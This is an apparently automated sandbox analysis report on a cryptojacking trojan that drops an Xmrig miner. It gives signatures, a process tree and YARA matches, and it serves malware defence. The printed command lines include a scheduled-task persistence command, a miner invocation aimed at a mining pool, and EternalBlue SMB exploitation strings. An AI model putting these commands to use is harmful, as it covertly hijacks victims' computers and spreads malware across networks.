Edit tour

Windows Analysis Report
x00zm3KVwb.exe

Overview

General Information

Sample name:	x00zm3KVwb.exe renamed because original name is a hash value
Original sample name:	2cf24966a6aad7b6ecffe04a20eaf3dd.exe
Analysis ID:	1457365
MD5:	2cf24966a6aad7b6ecffe04a20eaf3dd
SHA1:	e50a4184953faeec7e40bb33f52c08d7f22a2519
SHA256:	01c9940b468ce2a58f2bc52f5c8b7d0310451c994d798879ff653d92fbaf8719
Tags:	32exetrojan
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Xmrig

Yara detected Powershell download and execute

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Connects to many different private IPs (likely to spread or exploit)

Connects to many different private IPs via SMB (likely to spread or exploit)

Detected Stratum mining protocol

Excessive usage of taskkill to terminate processes

Found strings related to Crypto-Mining

Machine Learning detection for dropped file

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Sigma detected: Potential Crypto Mining Activity

Sigma detected: Suspicious Epmap Connection

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses ipconfig to lookup or modify the Windows network settings

Uses schtasks.exe or at.exe to add and modify task schedules

Abnormal high CPU Usage

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Too many similar processes found

Uses 32bit PE files

Uses taskkill to terminate processes

Yara signature match

Classification

Process Tree

System is w10x64

x00zm3KVwb.exe (PID: 5708 cmdline: "C:\Users\user\Desktop\x00zm3KVwb.exe" MD5: 2CF24966A6AAD7B6ECFFE04A20EAF3DD)

cmd.exe (PID: 5896 cmdline: cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\x00zm3KVwb.exe /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4748 cmdline: schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\x00zm3KVwb.exe /F MD5: 48C2FE20575769DE916F48EF0676A965)

Conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6468 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5576 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 5060 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6780 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

Conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6500 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4524 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 3472 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2508 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

Conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5680 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3624 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 4836 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4712 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 1684 cmdline: cmd /c ipconfig /flushdns MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 2952 cmdline: ipconfig /flushdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)

cmd.exe (PID: 5060 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3472 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 2568 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2220 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

syabcd.exe (PID: 2468 cmdline: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K MD5: 23D84A7ED2E8E76D0A13197B74913654)

cmd.exe (PID: 6464 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7216 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 7224 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7316 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

Conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

syabcd.exe (PID: 7284 cmdline: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K MD5: 23D84A7ED2E8E76D0A13197B74913654)

cmd.exe (PID: 7308 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7380 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

Conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7412 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7464 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

syabcd.exe (PID: 7420 cmdline: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K MD5: 23D84A7ED2E8E76D0A13197B74913654)

cmd.exe (PID: 7472 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7548 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

syabcd.exe (PID: 7532 cmdline: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K MD5: 23D84A7ED2E8E76D0A13197B74913654)

cmd.exe (PID: 7576 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7624 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

Conhost.exe (PID: 3596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7652 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7696 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

syabcd.exe (PID: 7708 cmdline: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K MD5: 23D84A7ED2E8E76D0A13197B74913654)

cmd.exe (PID: 7736 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7788 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

Conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7824 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7884 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

Conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

syabcd.exe (PID: 7840 cmdline: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K MD5: 23D84A7ED2E8E76D0A13197B74913654)

conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7952 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7996 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

syabcd.exe (PID: 8008 cmdline: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K MD5: 23D84A7ED2E8E76D0A13197B74913654)

conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8016 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 8108 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 8080 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 8168 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 8188 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4952 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

syabcd.exe (PID: 5532 cmdline: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K MD5: 23D84A7ED2E8E76D0A13197B74913654)

conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2408 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2460 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

Conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3664 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4836 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

Conhost.exe (PID: 8500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

syabcd.exe (PID: 6400 cmdline: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K MD5: 23D84A7ED2E8E76D0A13197B74913654)

conhost.exe (PID: 3472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1360 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7232 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 7220 cmdline: cmd /c taskkill /f /im syabcd.exe&&exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7336 cmdline: taskkill /f /im syabcd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

Conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 5364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

x00zm3KVwb.exe (PID: 7120 cmdline: C:\Users\user\Desktop\x00zm3KVwb.exe MD5: 2CF24966A6AAD7B6ECFFE04A20EAF3DD)

Conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

x00zm3KVwb.exe (PID: 7796 cmdline: C:\Users\user\Desktop\x00zm3KVwb.exe MD5: 2CF24966A6AAD7B6ECFFE04A20EAF3DD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
x00zm3KVwb.exe	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x314d4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x31516a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x314e16:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x314fc7:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x315232:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\X86.dll	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\ProgramData\X64.dll	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\ProgramData\spread.txt	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x314d4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x31516a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x314e16:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x314fc7:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x315232:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.2180544900.00000000038BE000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0xe1c:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0xfd2:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
00000000.00000003.2181302277.00000000038BE000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0xe2a:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
00000000.00000000.2011066839.00000000005EA000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x5bb4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x5bf6a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x5bc16:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x5bdc7:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x5c032:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
00000013.00000000.2023397637.00000000005EA000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x5bb4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x5bf6a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x5bc16:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x5bdc7:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x5c032:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
00000013.00000002.2029337004.00000000005EA000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x5bb4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x5bf6a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x5bc16:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x5bdc7:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x5c032:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
00000000.00000003.2180356791.00000000038BC000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0xe2a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0xfe0:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
0000003E.00000002.2054520741.00000000005EA000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x5bb4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x5bf6a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x5bc16:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x5bdc7:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x5c032:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
